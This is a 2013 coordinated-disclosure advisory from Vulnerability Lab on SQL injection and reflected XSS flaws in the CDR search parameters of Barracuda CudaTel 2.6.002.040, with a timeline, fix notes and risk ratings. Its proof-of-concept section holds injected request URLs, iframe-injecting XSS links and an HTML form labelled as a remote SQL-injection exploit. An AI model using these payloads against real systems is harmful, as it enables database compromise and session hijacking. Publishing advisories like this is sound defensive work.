Title:
======
Barracuda CudaTel 2.6.02.040 - SQL Injection Vulnerability

Date:
=====
2013-07-20


References:
===========
http://vulnerability-lab.com/get_content.php?id=775

BARRACUDA NETWORK SECURITY ID: BNSEC-723


VL-ID:
=====
775


Common Vulnerability Scoring System:
====================================
8.6


Introduction:
=============
Designed to enable seamless voice and video communication, the CudaTel 
Communication Server is an easy-to-use, 
affordable, next-generation phone system for businesses. CudaTel Communication 
Server s enterprise-class 
feature set includes Voice over IP (VoIP) PBX services, conferencing, 
follow-me, automated attendant services, 
and more, controlled by an easy-to-use Web interface. CudaTel Communication 
Server is compatible with any SIP 
device and provider, and can be pre-configured for use with both analog and 
digital telephone networks. Powerful, 
Complete Solution With an expansive feature set and and no per user or phone 
licensing fees, the CudaTel 
Communication Server is equipped and priced for organizations of any size. 
Native High Definition audio support 
and integrated phone line (TDM) hardware produces an unparalleled audio 
experience. VOIP encryption protects calls 
from hackers and digital eavesdroppers.

(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )


Abstract:
=========
1.1
The Vulnerability Laboratory Research Team discovered a sql injection 
vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.

1.2
The Vulnerability Laboratory Research Team discovered a client side 
vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.


Report-Timeline:
================
2012-11-26:     Researcher Notification & Coordination (Benjamin Kunz Mejri)
2012-11-27:     Vendor Notification (Barracuda Networks Security Team - Bug 
Bounty Program)
2012-12-01:     Vendor Response/Feedback (Barracuda Networks Security Team - 
Bug Bounty Program)
2013-03-01:     Vendor Fix/Patch (Barracuda Networks Developer Team) [Manager: 
Dave Farrow]
2013-07-20:     Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
1.1
A SQL Injection vulnerability is detected in the Barracuda Networks CudaTel 
v2.6.002.040 appliance web application.
The vulnerability allows remote attackers or local low privilege application 
user accounts to inject (execute) 
own SQL commands to the affected application dbms. 

The blind sql injection vulnerability is located in the cdr module when 
processing to request manipulated row & page 
parameters as searchstring. A remote attacker can for example delete the 
standard value context of the module request 
to inject (execute) own sql commands. 

Eploitation of the vulnerability requires a low privilege web application user 
account and no user interaction.
Successful exploitation of the vulnerability results in datbase management 
system and web application compromise.

Vulnerable Section(s)
                                [+] search - listing

Vulnerable Module(s)
                                [+] cdr - seachstring listing

Vulnerable Parameter(s)
                                [+] &row
                                [+] &page



1.2
A client side input validation vulnerability is detected in the Barracuda 
Networks CudaTel v2.6.002.040 appliance web application.
The non-persistent vulnerability allows remote attackers to manipulate client 
side application requests to browser.

The secound vulnerability (client side) is located in the invalid value 
exception handling. Remote attackers can provoke the 
exception-handling by including invalid script code inputs to redisplay the 
malicious context when processing to load the output.
To provoke the exception-handling the remote attacker can use the vulnerable 
row parameter of the cdr searchstring listing to 
execute own malicious (client-side) script code.

Exploitation of the vulnerability requires a no web application user account 
but medium or high user interaction.
Successful exploitation of the vulnerability results in client side phishing, 
client side session hijacking and client side 
external redirects to malware or malicious websites. Exploitation requires 
medium user interaction.

Vulnerable Section(s):
                                [+] search - listing

Vulnerable Module(s):
                                [+] cdr - seachstring listing

Vulnerable Parameter(s):
                                [+] &row

Affected Module(s):
                                [+] Exception-Handling (invalid value)


Proof of Concept:
=================
1.1
The sql injection vulnerability can be exploited by remote attackers with low 
privilege web application user account and without user interaction.
For demonstration or reproduce ...

Standard Request: Row 100
http://cudatel.127.0.0.1:1336/gui/cdr/cdr?_=1353973149509&since=1+day&search_string=&rows=100&page=1&sortby=end_timestamp&sortorder=desc

Standard Request: Output
--- 1.
{"count":0,"page":"1","cdr":[],"rows":"100"}


Manipulated Request: 
http://cudatel.127.0.0.1:1337/gui/cdr/cdr?
_=1353973149509&since=1+day&search_string=&rows=100&page='1+1%27[SQL-Injection!]%27--&sortby=end_timestamp&sortorder=desc
... or
http://cudatel.127.0.0.1:1337/gui/cdr/cdr?
%20%20_=1353973149509&since=1+day&search_string=&page='1335&page='1336&page='1337&rows='1+1%27[SQL-Injection!]%27--&page=1&sortby=end_timestamp&sortorder=desc


Manipulated Output:
--- 1.

cdr: []

count: 0
page: 1
rows: 1+2


--- 1.
cdr: []

count: 1+2'
page: 
  - '1335
  - '1336
  - '1337
  - '1
rows: -1+1'[SQL-Injection!]'--


Exploit (PoC):

<html><head><body><meta http-equiv="Content-Type" content="text/html; 
charset=iso-8859-9">
<title>Barracuda Networks CudaTel [CDR] (ROW&PAGE) - Remote SQL-Injection 
[PROOF OF CONCEPT]</title>
<script language="JavaScript">
var path="/gui/cdr/cdr"
var 
adres="?%20%20_=1353973149509&since=1+day&search_string=&page='1335&page='1336&page='1337&rows="
var domain ="http://cudatel.127.0.0.1:1337";
var sql = "'1+1%27[SQL-Injection!]%27--"  
function command(){
if (document.rfi.target1.value==""){
alert("NOPE!");
return false;
}  
rfi.action= document.rfi.target1.value+path+adres+domain+sql;
rfi.submit();
}
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Barracuda Networks CudaTel [CDR] (ROW&PAGE) - Remote SQL-Injection Exploit
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Vulnerability Research Laboratory (www.vulnerability-lab.com)
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Greets: Ibrahim EL-Sayed, Chokri Ben Achour, Mohammed ABKD. & Stealthwalker
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
</script></head><body bgcolor="#000000" link="#990000">
<center><p align="center"><b><font face="Verdana" size="2" 
color="#006633">Barracuda Networks CudaTel [CDR] (ROW&PAGE) 
- Remote SQL-Injection Exploit</font>
</b></p><form method="post" target="getting" name="rfi" 
onSubmit="command();"><div align="left">
<p><b><font face="Arial" size="2" color="#006633">VICTIM:</font></b>
<input type="text" name="target1" size="53" style="background-color: #006633" 
onMouseOver="javascript:this.style.background='#808080';" 
onMouseOut="javascript:this.style.background='#808000';"></p>
<p><b><font face="Arial" size="2" color="#006633">EXAMPLE:</font><font 
face="Arial" size="2" color="#808080">  
HTTP://VULNERABILITY-LAB.COM/[SCRIPT-PATH]/</font></b></p></div>
<p align="left"><input type="submit" value="Execute INPUT" name="B1">
</p><p align="left"><input type="reset" value="Clear ALL" 
name="B2"></p></form><p><br>
<iframe name="getting" height="337" width="633" scrolling="yes" 
frameborder="0"></iframe></p><div align="left">
  <p align="center"><b><font face="Verdana" size="2" 
color="#008000">VULNERABILITY-LAB <a 
href="mailto:resea...@vulnerability-lab.com";>
BKM</a></font></b></p></div></center></body></html>


1.2
The client side input validation vulnerability can be exploited by remote 
attackers without application user account and with medium required user 
interaction.
For demonstration or reproduce ...

PoC:
http://cudatel.127.0.0.1:1336/gui/cdr/cdr?
_=1353973149509&since=1+day&search_string=&rows=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]&page=1&sortby=end_timestamp&sortorder=desc

http://cudatel.127.0.0.1:1336/gui/cdr/cdr?
_=1353973149509&since=1+day&search_string=&rows=100&page=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]&sortby=end_timestamp&sortorder=desc

Note: We only verified the bug with the same exception in a not parsed 
parameter but the bug itself is located in all areas of the invalid exception.


Solution:
=========
1.1
To patch the sql injection it is required to parse the row and page parameters 
in the cdr module.

1.2
To fix the client side xss vulnerability parse by encoding the row parameter 
and restrict the input.
Encode the affected exception-handling output listing when processing to 
display invalid input values.

Note: Barracuda Networks provided an update of version 2.6.002.040 to 
v2.6.003.x to all clients and customers in the bn customer area.


Risk:
=====
1.1
The security risk of the remote sql injection web vulnerability  is estimated 
critical.

1.2
The security risk of the client side input validation web vulnerability is 
estimated as medium(-).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com              
               - www.evolution-sec.com
Contact:    ad...@vulnerability-lab.com         - 
resea...@vulnerability-lab.com               - ad...@evolution-sec.com
Section:    www.vulnerability-lab.com/dev       - forum.vulnerability-db.com    
               - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab 
               - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
resea...@vulnerability-lab.com) to get a permission.

                                Copyright © 2013 | Vulnerability Laboratory 
[Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: resea...@vulnerability-lab.com


Reply via email to